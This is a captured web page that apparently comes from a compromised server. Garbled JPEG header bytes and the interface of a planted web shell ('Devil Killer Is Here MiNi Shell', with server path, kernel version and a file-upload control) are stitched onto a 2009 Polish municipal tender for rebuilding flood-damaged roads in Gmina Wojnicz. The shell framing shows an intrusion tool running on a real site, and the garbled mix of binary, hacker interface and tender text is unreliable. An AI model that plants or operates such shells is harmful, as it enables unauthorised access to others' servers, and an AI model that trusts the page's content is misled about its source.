JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090911/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20090911/153467-N-2009.html

<p class="kh_header"><b>Wojnicz: Usuwanie skutków powodzi na terenie Gminy Wojnicz - odbudowa dróg gminnych zniszczonych lub uszkodzonych w wyniku działania powodzi mającej miejsce w 2009 roku.</b><br>
<b>Numer ogłoszenia: 153467 - 2009; data zamieszczenia: 11.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wojnicz , Rynek 1, 32-830 Wojnicz, woj. małopolskie, tel. 014 6790108, faks 014 6790100.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wojnicz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usuwanie skutków powodzi na terenie Gminy Wojnicz - odbudowa dróg gminnych zniszczonych lub uszkodzonych w wyniku działania powodzi mającej miejsce w 2009 roku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są roboty w zakresie odbudowy dróg gminnych zniszczonych lub uszkodzonych podczas powodzi w 2009 r.
1) Droga - Koło Prokopa ( nr działki 293 ), droga Kolonia II i drogi sąsiednie ( nr działek 282 i 309 ) wraz ze skrzyżowaniem - miejscowość Wielka Wieś.
Zakres robót obejmuje:
a) mechaniczne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni w gruncie kat. I-IV - ilość: 50 m2,
b) wykonanie podbudowy z kruszywa łamanego - warstwa górna o grubości po zagęszczeniu 10 cm - ilość: 50 m2,
c) wykonanie nawierzchni z mieszanek mineralno-bitumicznych grysowo-żwirowych - warstwa ścieralna asfaltowa - grubość po zagęszczeniu 6 cm wraz z transportem masy do miejsca wbudowania - ilość: 320 m2,
d) wykonanie poboczy z kruszywa łamanego - grubość pobocza po zagęszczeniu 6 cm - ilość: 90 m2.
2) Droga Grabno-Milówka ( nr działki 868/1 )- miejscowość Grabno.
Zakres robót obejmuje:
a) wykonanie koryta na poszerzeniach jezdni w gruncie kat. II-IV - 16 cm głębokości koryta - ilość: 240 m2,
b) wykonanie podbudowy z kruszywa łamanego - warstwa górna o grubości po zagęszczeniu 10 cm - ilość: 240 m2,
c) wykonanie nawierzchni z mieszanek mineralno-bitumicznych grysowo-żwirowych - warstwa ścieralna asfaltowa - grubość po zagęszczeniu 6 cm wraz z transportem masy do miejsca wbudowania - ilość: 440 m2,
d) wykonanie poboczy z kruszywa łamanego - grubość pobocza po zagęszczeniu 6 cm - ilość: 50 m2.
3) Droga Grabno-Rudka ( nr działki 690/1 i 690/2 ) - miejscowość Grabno.
Zakres robót obejmuje:
a) mechaniczne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni w gruncie kat. I-IV - ilość: 720 m2,
b) wykonanie podbudowy z kruszywa łamanego - warstwa górna o grubości po zagęszczeniu 10 cm - ilość: 720 m2,
c) wykonanie nawierzchni z mieszanek mineralno-bitumicznych grysowo-żwirowych - warstwa ścieralna asfaltowa - grubość po zagęszczeniu 6 cm wraz z transportem masy do miejsca wbudowania - ilość: 600 m2,
d) wykonanie poboczy z kruszywa łamanego - grubość pobocza po zagęszczeniu 6 cm - ilość: 120 m2.
4) Droga Grabno-Podmilówka ( nr działki 1075 ) - miejscowość Grabno.
Zakres robót obejmuje:
a) mechaniczne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni w gruncie kat. I-IV - ilość: 608 m2,
b) wykonanie podbudowy z kruszywa łamanego - warstwa górna o grubości po zagęszczeniu 10 cm - ilość: 608 m2,
c) wykonanie nawierzchni z mieszanek mineralno-bitumicznych grysowo-żwirowych - warstwa ścieralna asfaltowa - grubość po zagęszczeniu 6 cm wraz z transportem masy do miejsca wbudowania - ilość: 513 m2,
d) wykonanie poboczy z kruszywa łamanego - grubość pobocza po zagęszczeniu 6 cm - ilość: 95 m2.
5) Droga Na Bojdo - Kuboń ( nr działki 153 ) - miejscowość Sukmanie.
Zakres robót obejmuje:
a) mechaniczne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni w gruncie kat. I-IV - ilość: 360 m2,
b) wykonanie podbudowy z kruszywa łamanego - warstwa górna o grubości po zagęszczeniu 10 cm - ilość: 360 m2,
c) wykonanie nawierzchni z mieszanek mineralno-bitumicznych grysowo-żwirowych - warstwa ścieralna asfaltowa - grubość po zagęszczeniu 6 cm wraz z transportem masy do miejsca wbudowania - ilość: 360 m2,
6) Droga Na Gwoździec (nr działki 458 ) - miejscowość Olszyny.
Zakres robót obejmuje:
a) mechaniczne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni w gruncie kat. I-IV - ilość: 1 120 m2,
b) wykonanie podbudowy z kruszywa łamanego - warstwa górna o grubości po zagęszczeniu 10 cm - ilość: 1 120 m2,
c) wykonanie nawierzchni z mieszanek mineralno-bitumicznych grysowo-żwirowych - warstwa ścieralna asfaltowa - grubość po zagęszczeniu 6 cm wraz z transportem masy do miejsca wbudowania - ilość: 840 m2,
d) wykonanie poboczy z kruszywa łamanego - grubość pobocza po zagęszczeniu 6 cm - ilość: 280 m2.
7) Droga Na Lasowe Domy ( nr działki 402 ) - miejscowość Milówka.
Zakres robót obejmuje:
a) mechaniczne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni w gruncie kat. I-IV - ilość: 1 575 m2,
b) wykonanie podbudowy z kruszywa łamanego - warstwa górna o grubości po zagęszczeniu 10 cm - ilość: 1 575 m2,
c) wykonanie nawierzchni z mieszanek mineralno-bitumicznych grysowo-żwirowych - warstwa ścieralna asfaltowa - grubość po zagęszczeniu 6 cm wraz z transportem masy do miejsca wbudowania - ilość: 1 125 m2,
d) wykonanie poboczy z kruszywa łamanego - grubość pobocza po zagęszczeniu 6 cm - ilość: 450 m2, 
8) Droga Szkodna Południowa ( nr działki 288 ) - miejscowość Olszyny.
Zakres robót obejmuje:
a) mechaniczne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni w gruncie kat. I-IV - ilość: 720 m2,
b) wykonanie podbudowy z kruszywa łamanego - warstwa górna o grubości po zagęszczeniu 10 cm - ilość: 720 m2,
c) wykonanie nawierzchni z mieszanek mineralno-bitumicznych grysowo-żwirowych - warstwa ścieralna asfaltowa - grubość po zagęszczeniu 6 cm wraz z transportem masy do miejsca wbudowania - ilość: 600 m2,
d) wykonanie poboczy z kruszywa łamanego - grubość pobocza po zagęszczeniu 6 cm - ilość: 120 m2, 
9) Droga W stronę pana E. Surga ( nr działki 134 ) - miejscowość Milówka.
Zakres robót obejmuje:
a) mechaniczne profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni w gruncie kat. I-IV - ilość: 540 m2,
b) wykonanie podbudowy z kruszywa łamanego - warstwa górna o grubości po zagęszczeniu 10 cm - ilość: 540 m2,
c) wykonanie nawierzchni z mieszanek mineralno-bitumicznych grysowo-żwirowych - warstwa ścieralna asfaltowa - grubość po zagęszczeniu 6 cm wraz z transportem masy do miejsca wbudowania - ilość: 450 m2,
d) wykonanie poboczy z kruszywa łamanego - grubość pobocza po zagęszczeniu 6 cm - ilość: 90 m2, 
2. Wykonawca powyższy zakres robót drogowych wykona z materiałów własnych.  
3. Szczegółowy zakres robót i sposób ich wykonania został bardzo dokładnie określony oraz opisany w dokumentach, które stanowią załączniki do niniejszej Specyfikacji Istotnych Warunków Zamówienia tj. w:  
1) kosztorysie ofertowym remont drogi Koło Prokopa - ( nr działki 293 ), droga Kolonia II i drogi sąsiednie - ( nr działek 282 i 309 ) wraz ze skrzyżowaniem - miejscowość Wielka Wieś - załącznik Nr 4,
2) kosztorysie ofertowym droga Grabno-Milówka ( nr działki 868/1 )- miejscowość Grabno - załącznik Nr 5,
3) kosztorysie ofertowym droga Grabno-Rudka (nr działki 690/1 i 690/2) - miejscowość Grabno - załącznik Nr 6,
4) kosztorysie ofertowym droga (Grabno- Podmilówka) nr działki 1075 - miejscowość Grabno - załącznik Nr 7,
5) kosztorysie ofertowym droga Na Bojdo-Kuboń ( nr działki 153 ) - miejscowość Sukmanie - załącznik Nr 8,
6) kosztorysie ofertowym droga Na Gwoździec ( nr działki 458 )- miejscowość Olszyny - załącznik Nr 9,
7) kosztorysie ofertowym droga Na Lasowe Domy (nr działki 402) - miejscowość Milówka - załącznik Nr 10,
8) kosztorysie ofertowym droga Szkodna Południowa ( nr działki 288) - miejscowość Olszyny - załącznik Nr 11,
9) kosztorysie ofertowym droga W stronę pana E. Surga ( nr działki 134 ) - miejscowość Milówka - załącznik Nr 12.
10) szczegółowe specyfikacje techniczne remont drogi Koło Prokopa (nr działki 293), droga Kolonia II i drogi sąsiednie - ( nr działek 282 i 309 ) wraz ze skrzyżowaniem - miejscowość Wielka Wieś - załącznik Nr 13,
11) szczegółowe specyfikacje techniczne droga Grabno-Milówka (nr działki 868/1 ) - miejscowość Grabno - załącznik Nr 14,
12) szczegółowe specyfikacje techniczne droga Grabno-Rudka ( nr działki 690/1 i 690/2 )- miejscowość Grabno - załącznik Nr 15,
13) szczegółowe specyfikacje techniczne droga Grabno-Podmilówka ( nr działki 1075 )- miejscowość Grabno - załącznik Nr 16,
14) szczegółowe specyfikacje techniczne droga Na Bojdo-Kuboń ( nr działki 153 ) - miejscowość Sukmanie - załącznik Nr 17,
15) szczegółowe specyfikacje techniczne droga Na Gwoździec ( nr działki 458 ) - miejscowość Olszyny - załącznik Nr 18,
16) szczegółowe specyfikacje techniczne droga Na Lasowe Domy ( nr działki 402 )- miejscowość Milówka - załącznik Nr 19,
17) szczegółowe specyfikacje techniczne droga Szkodna Południowa ( nr działki 288 )- miejscowość Olszyny - załącznik Nr 20,
18) szczegółowe specyfikacje techniczne droga W stronę pana E. Surga ( nr działki 134 )- miejscowość Milówka - załącznik Nr 21..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.20-7, 45.23.31.42-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 35.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości  8 000,00 zł ( słownie: osiem tysięcy złotych ).
2. Wadium musi obejmować okres związania ofertą tj.  30 dni.
3. Wadium wnosi się przed upływem terminu składania ofert. Termin wniesienia wadium upływa w dniu 02 października 2009 r. o godz. 12:30. 
4. Wadium może być wnoszone w jednej lub w  kilku następujących formach przewidzianych w art. 45 ust. 6 ustawy Prawo zamówień publicznych tj.:
1) pieniądzu;
2) poręczeniach bankowych lub poręczeniach spółdziel?czej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3) gwarancjach bankowych;
4) gwarancjach ubezpieczeniowych;
5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczo?ści (Dz. U. z 2007 r. Nr 42, poz.275 ).   
5. Wybór formy wadium należy do Wykonawcy.
Wadium w pieniądzu należy wnieść przelewem na wydzielony rachunek Zamawiającego: Urząd Miejski w Wojniczu ul. Rynek 1 - Bank Spółdzielczy Rzemiosła  Kraków Oddział w Wojniczu nr 70 85890006 0010 0000 0202 0013 z adnotacją:  wadium dot. przetargu nieograniczonego: Usuwanie skutków powodzi na terenie Gminy Wojnicz - odbudowa dróg gminnych zniszczonych lub uszkodzonych w wyniku działania powodzi mającej miejsce w 2009 roku. 
Przy czym za termin wniesienia wadium w formie pieniężnej przyjmuje się termin   uznania na rachunku bankowym Zamawiającego. 
6. Wadium w innej formie niż pieniądz ( np. poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, gwarancjach bankowych, gwarancjach ubezpieczeniowych ) należy złożyć w formie oryginału w osobnej kopercie w siedzibie Zamawiającego - Urząd Miejski w Wojniczu ul. Rynek 1,  pokój nr 11 - ( Sekretariat ) nie później niż do dnia 02 października 2009 roku    do godz. 12:30. 
UWAGA: natomiast do złożonej przez Wykonawcę oferty należy dołączyć kopię dokumentu wadialnego potwierdzonego za zgodność z oryginałem.
7. Polisa, poręczenie, gwarancje lub inny dokument stanowiący formę wadium winny zawierać stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty kwoty wadium zgodnie z warunkami Specyfikacji Istotnych Warunków Zamówienia następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń ze strony gwaranta/poręczyciela.
8. Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 4 ustawy, a jego oferta zostanie uznana za odrzuconą na podstawie art. 24 ust. 4 ustawy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się wyłącznie Wykonawcy, którzy: 
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym  i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
a) w zakresie posiadanej niezbędnej wiedzy i doświadczenia,
Wykonawca musi wykazać, że posiada doświadczenie w wykonaniu minimum 2 zadań odpowiadających swoim rodzajem i wartością zamówieniu  w składanej ofercie.
Warunek ten zostanie spełniony przez Wykonawcę, jeżeli:
wykaże się, że okresie ostatnich 5 latach przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie ukończył z należytą stronnością realizację co najmniej dwóch robót drogowych ( dwóch zamówień ) o zakresie i złożoności porównywalnej  z przedmiotem niniejszego postępowania w zakresie wykonania remontu dróg, który polegał na wykonaniu nakładek bitumicznych. Wartość każdego z wykazanych przez Wykonawcę zamówień - dla każdego z nich osobno nie może być mniejsza niż kwota brutto zawarta w ofercie złożonej przez Wykonawcę.
Przy czym należyte i nie budzące zastrzeżeń wykonanie zamówienia potwierdzone musi być stosownymi dokumentami stwierdzającymi, że roboty budowlane zostały wykonane należycie ( np. referencje, protokoły odbioru końcowego, opinie ). 
b) w zakresie osób zdolnych do wykonania zamówienia.
Zamawiający wymaga, aby Wykonawca dysponował osobami zdolnymi do wykonania zamówienia i kierownikiem budowy posiadającym uprawnienia budowlane do sprawowania samodzielnych funkcji technicznych w budownictwie w specjalności drogowej bez ograniczeń lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia.
Warunek ten zostanie spełniony przez Wykonawcę, jeżeli:
wykaże się, że dysponuje osobami zdolnymi do wykonania zamówienia tj. pracownikami posiadającymi odpowiednie kwalifikacje do wykonania robót wchodzących w zakresie zamówienia na stanowiskach robotniczych ( pracownicy drogowi, operatorzy sprzętu, kierowcy itp.) 
Kandydat na stanowisko Kierownika budowy musi posiadać - zgodnie z  ustawą z dnia 7 lipca 1994 r. Prawo Budowlane ( Dz. U. z 2006 r. Nr 156 poz. 1118 z późniejszymi zmianami ) oraz aktualnym obowiązującym rozporządzeniem Ministra Transportu i Budownictwa z dnia 28.04.2006 w sprawie samodzielnych funkcji technicznych w budownictwie ( Dz. U z 2006 roku nr 83 poz.578 ) uprawnienia budowlane w specjalności drogowej bez ograniczeń lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów - w zakresie wystarczającym do kierowania robotami drogowymi - jako kierownik budowy.        
Osoba ta musi być również członkiem właściwej Izby Samorządu Zawodowego Inżynierów Budownictwa, co należy potwierdzić zaświadczeniem wydanym przez tę izbę z określonym na niej terminem ważności. 
c) w zakresie potencjału technicznego.
Wykonawca musi wykazać, że dysponuje wytwórnią mas bitumicznych w odległości od miejsca budowy zapewniającej transport i wbudowanie ( z zachowaniem parametrów masy ) w czasie nie dłuższym niż 1,5 godziny lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego tzn. wytwórni spełniającej  w/w warunek. 
3)  znajdują w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
W przetargu mogą wziąć udział Wykonawcy, którzy:
a) posiadają środki finansowe lub zdolność kredytową o łącznej kwocie w wysokości co najmniej  80 % ceny brutto oferty Wykonawcy.
Warunek ten zostanie spełniony przez Wykonawcę, jeżeli:
Wykonawca wykaże, że dla zabezpieczenia bieżącego wykonywania robót posiada środki finansowe lub zdolność kredytową w wysokości minimum 80 % ceny brutto swojej oferty. 
b) są ubezpieczeni od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej o wartości nie mniejszej niż 200 tys. zł.
Warunek ten zostanie spełniony przez Wykonawcę, jeżeli:
Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej z tytułu prowadzenia działalności gospodarczej na kwotę nie mniejszą niż 200 tys. zł.         ( ubezpieczenie dotyczy roku 2009 ).
4)  nie podlegają wykluczeniu z postępowania o udzielenie zamówienia  na podstawie art. 24 ust. 1 i 2 ustawy Prawo Zamówień Publicznych z dnia             29 stycznia 2004 (Dz. U. z 2007 r. Nr 223 poz. 1655 z późn. zm.)
2. Wyżej wyszczególnione warunki zostaną uznane za spełnione, jeżeli Wykonawca złoży dokumenty i oświadczenia, które zostały szczegółowo wyszczególnione        w § 6 niniejszej specyfikacji. Wykaz oświadczeń i dokumentów, jakie mają dostarczyć wykonawcy w celu potwierdzenia warunków udziału w postępowaniu Ocena spełniania warunków udziału w postępowaniu zostanie dokonana metodą    zero - jedynkową .tzn. według formuły spełnia - nie spełnia.
3. Z postępowania o udzielenie zamówienia publicznego wyklucza się Wykonawców niespełniających wymagań określonych przepisami art. 24 ust. 1 i 2 Prawa zamówień publicznych.
4. Oferta Wykonawcy wykluczonego uznana zostanie za odrzuconą.
5. Zamawiający odrzuci ofertę, jeżeli:
1) jest niezgodna z ustawą,
2) jej treść nie odpowiada treści Specyfikacji Istotnych Warunków Zamówienia, z zastrzeżeniem art. 87 ust. 2 pkt 3,  
3) jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji,
4) zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,
5) została złożona przez Wykonawcę wykluczonego z udziału w postępowaniu        o udzielenie zamówienia,
6) zawiera błędy w obliczeniu ceny,
7) Wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się     na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy Prawo zamówień publicznych, 
8) jest nieważna na podstawie odrębnych przepisów.   
6. O wykluczeniu z postępowania oraz o odrzuceniu oferty Wykonawcy zostaną zawiadomieni niezwłocznie po dokonaniu wyboru najkorzystniejszej oferty. Zawiadomienie zawierać będzie uzasadnienie faktyczne i prawne..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenie, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności objętych przedmiotem zamówienia oraz niepodlegania wykluczeniu z postępowania w sprawie zamówienia publicznego na podstawie art. 24 ust. 1 i 2 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych - do oferty należy dołączyć następujące dokumenty i oświadczenia:
1) Oświadczenie o spełnianiu warunków udziału w postępowaniu, które powinno być sporządzone według wzoru stanowiącego załącznik nr 2 do SIWZ,
2) Aktualny odpis z właściwego rejestru  albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru  lub zgłoszenia do ewidencji działalności gospodarczej -  wystawiony nie wcześniej, niż 6 miesięcy przed upływem terminu składania ofert,
3) Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że Wykonawca nie zalega z opłaceniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminy składania ofert,
4) Aktualną informację z Krajowego Rejestru Karnego  w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy. Informacja powinna być wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
5) Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy. Informacja powinna być wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2. W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponują, lub będą dysponować potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, do oferty należy dołączyć następujące dokumenty:
1) Wykaz wykonanych robót budowlanych , w okresie ostatnich pięciu lat przed wszczęciem niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy -  w tym okresie odpowiadającym swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania oraz z załączeniem dokumentów potwierdzających, że roboty te zostały wykonane z należytą starannością. Pod uwagę będą brane tylko te dokumenty, potwierdzające, że roboty, zostały przez Wykonawcę wykonane należycie ( np. referencje ) w których zostaną określone następujące dane: rodzaj, wielkość i wartość robót, rok realizacji robót.
2) Wykaz  osób którymi dysponuje lub będzie dysponował Wykonawca i które to osoby będą uczestniczyć w wykonaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia a także zakresu wykonywanych przez nich czynności. Do wykazu kluczowego personelu musi być dołączona kopia uprawnień budowlanych i aktualny dokument stwierdzający przynależność do właściwej miejscowo Izby Samorządu Zawodowego ( Izby Inżynierów Budownictwa ) z określonym terminem ważności - Kierownika budowy.
